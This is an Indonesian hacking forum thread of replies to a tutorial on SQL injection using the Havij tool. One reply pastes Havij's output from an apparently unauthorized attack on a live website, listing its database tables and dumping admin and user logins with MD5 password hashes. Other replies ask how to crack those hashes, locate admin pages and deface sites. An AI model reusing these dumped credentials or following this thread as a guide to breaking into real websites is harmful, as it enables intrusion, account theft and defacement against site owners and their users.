Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

[Tutorial] SQL Injection menggunakan Havij Vers 1.10

[ Facebook comments]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby ayong33 » Sat Aug 13, 2011 7:21 am

kok gak bsa gan hash md5.nya...
ad cara laen gak...?
ayong33
 
Posts: 6
Joined: Tue Aug 09, 2011 9:35 am

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby un4m3d » Sat Aug 13, 2011 1:13 pm

kk ..
find admin nya kok gag nemu jg yah, padahal aku udah dapet yg vurn neh
dan dapet semua akses masuknya termasuk login user + pass 'na

Host IP: ***.**.***.**
Web Server: Apache/2.2.14 (Ubuntu)
Powered-by: PHP/5.2.10-2ubuntu6
Keyword Found: p><b
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 5
Finding string column
Valid String Column is 2
Target Vulnerable :D
Current DB: cecial
Count(table_name) of information_schema.tables Where table_schema=0x63656369616C is 18
Tables found: tbl_arquivos,tbl_banners,tbl_categoria,tbl_email,tbl_emails,tbl_fotogaleria,tbl_imagens,tbl_mala_direta,tbl_menu,tbl_menu_adm,tbl_newsletter,tbl_noticias,tbl_paginas,tbl_status,tbl_submenu,tbl_submenu_adm,tbl_tipos,tbl_usuarios
Count(column_name) of information_schema.columns Where table_schema=0x63656369616C AND table_name=0x74626C5F656D61696C is 2
Columns found: id_email,email
Count(*) of cecial.tbl_email is 0
Can not get rows count, trying to get 10 rows
Turning off 'bypass illegal union' and retrying!
Data Found: email=
Turning on 'bypass illegal union' and retrying!
Data Found: id_email=
Turning off 'bypass illegal union' and retrying!
Data Found: email=
Turning on 'bypass illegal union' and retrying!
Data Found: id_email=
Turning off 'bypass illegal union' and retrying!
Data Found: email=
Turning on 'bypass illegal union' and retrying!
Data Found: id_email=
Turning off 'bypass illegal union' and retrying!
Data Found: email=
Turning on 'bypass illegal union' and retrying!
Data Found: id_email=
Canceling...
Job Canceled!
Count(column_name) of information_schema.columns Where table_schema=0x63656369616C AND table_name=0x74626C5F6D656E755F61646D is 4
Columns found: id_menu_adm,item_menu_adm,link_menu_adm,nivel_acesso
Count(column_name) of information_schema.columns Where table_schema=0x63656369616C AND table_name=0x74626C5F7573756172696F73 is 6
Columns found: id_usuario,nome_usuario,email_usuario,nivel_acesso,login_usuario,senha_usuario
Count(*) of cecial.tbl_usuarios is 3
Data Found: login_usuario=admin
Data Found: [email protected]
Data Found: nome_usuario=Administrador
Data Found: senha_usuario=87ed1dc579ed6a53528cea33d75eaed5
Data Found: nivel_acesso=1
Data Found: id_usuario=1
Data Found: login_usuario=jornalista
Data Found: [email protected]
Data Found: nome_usuario=Jornalista
Data Found: senha_usuario=3605fb0da091e9069f6da957932f1789
Data Found: nivel_acesso=2
Data Found: id_usuario=2
Data Found: login_usuario=hamilton
Data Found: [email protected]
Data Found: nome_usuario=Hamilton
Data Found: senha_usuario=b3edb2df76bc59cafe10222b9e9b4223
Data Found: nivel_acesso=1
Data Found: id_usuario=3
    learn...???
is not enough !!!
User avatar
un4m3d
 
Posts: 4
Joined: Thu Aug 11, 2011 7:40 am

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby poni » Mon Aug 15, 2011 12:44 am

Kadang admin mengubah nama page login supaya tidak gampang ditemukan oleh pihak luar.
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
User avatar
poni
 
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby detta3690 » Sun Aug 21, 2011 6:35 am

om mau tanya dong.. kalo webnya gini http://site.com/?
gmn? kan ga ada index php atau semacamnya..ga bisa di analyze dong..:(
detta3690
 
Posts: 1
Joined: Fri Aug 19, 2011 11:20 pm

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby veronochi » Tue Aug 30, 2011 11:16 pm

bagus om tutornya nie...

sayang ya havij untuk windows coba ada versi linuxnya keren dah...
Hanya Manusia Biasa
veronochi
 
Posts: 5
Joined: Tue Aug 30, 2011 11:01 pm

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby djisamsoe » Thu Sep 29, 2011 10:18 am

mantabs..bro :idea:
djisamsoe
 
Posts: 22
Joined: Tue Sep 27, 2011 7:42 am

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby kalil45 » Wed Oct 12, 2011 8:27 am

gan ane gak bisa crack MD5 nya untuk menjadi paswor,,
bantuan dan pencerahan di tunggu
kalil45
 
Posts: 1
Joined: Mon Oct 10, 2011 8:37 am

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby Tobyazx77x » Fri Oct 21, 2011 10:45 pm

om poni saya mau nanya nih kan saya mau nge deface web lain udah ketemu admin login nya
tapi cara nyari username and pass nya gimana?
maaf kalo ganggu :)
Tobyazx77x
 
Posts: 1
Joined: Fri Oct 21, 2011 2:42 am

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby M4d3X » Mon Oct 24, 2011 7:20 pm

masih bisa nggk oms?
M4d3X
 
Posts: 4
Joined: Wed Apr 13, 2011 1:11 am

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby ladade » Fri Nov 18, 2011 12:08 am

klo nyari" vulnerablenya gmana caranya?
sloganku GO A HACK
ladade
 
Posts: 36
Joined: Thu Nov 17, 2011 10:43 pm
Location: denpasar

leave a comment

PreviousNext

Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 20 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id